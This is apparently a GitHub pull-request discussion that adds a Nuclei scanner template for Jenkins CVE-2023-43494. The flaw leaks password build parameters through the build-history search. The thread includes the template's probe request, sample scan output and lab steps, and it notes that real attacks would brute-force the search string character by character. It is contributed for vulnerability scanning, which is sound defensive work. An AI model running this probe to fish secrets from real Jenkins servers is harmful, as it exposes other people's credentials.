Added CVE-2023-43494 Template

[sagarwal395]

Template Information:

Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.

References: https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261 http://www.openwall.com/lists/oss-security/2023/09/20/5

Nuclei Template:

id: jenkins-cve-2023-43494

info:
  name: Jenkins CVE-2023-43494 Exploit
  author: Saumya Agarwal
  severity: medium
  description: |
    Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/09/20/5
    - https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cve-id: CVE-2023-43494
    cwe-id: CWE-200
  tags: jenkins, cve-2023-43494, exploit

variables:
  project_name: "{{project_name}}"
  search_string: "{{search_string}}"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/job/{{project_name}}/buildHistory/ajax?search={{search_string}}"

    headers:
      accept: "*/*"
      accept-language: "en-US,en;q=0.9"
      sec-fetch-mode: "cors"
      sec-fetch-site: "same-origin"
      referer: "{{BaseURL}}/job/{{project_name}}/"
      referrerPolicy: "same-origin"

    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "(?s)<table[^>]*>.*?<tr[^>]*>.*?</tr>.*?</table>"

Expected output:

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

        projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.0 (latest)
[INF] Current nuclei-templates version: v9.9.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[jenkins-cve-2023-43494] [http] [medium] http://sample:1102e6286d7b37da45c20c34d1adeb3800@localhost:8080/job/vulcheck/buildHistory/ajax?search=nuc

[DhiyaneshGeek]

Hi @sagarwal395

Does this require project_name, search_string inputs supplied via variable option in CLI ?

Looking forward to hear back from you

Thanks

[sagarwal395]

Hi @DhiyaneshGeek,

Yes it does. It also requires the username and password of attackers with Item/Read permission. On a high level the issue is that the sensitive build variables like password are not excluded from search in build history and an attacker can fuzz through to get passwords used in any builds.

[DhiyaneshGeek]

@sagarwal395

any docker setup instructions ?

[sagarwal395]

@sagarwal395

any docker setup instructions ?

As of now no. Sorry have been busy with school. I will share the instructions for docker once ready. If you wanna quickly test it here are the steps:

1. Run jenkins 2.41x and create a project with password parameter. Run this job once. You can update the password and run multiple jobs.
2. Create a User with API key with Read only permission.
3. Test the committed nuclei template with all the info. The vulnerability allows attacker to search for a job in the history using the password as search string (in the real world scenario these can be brute forced).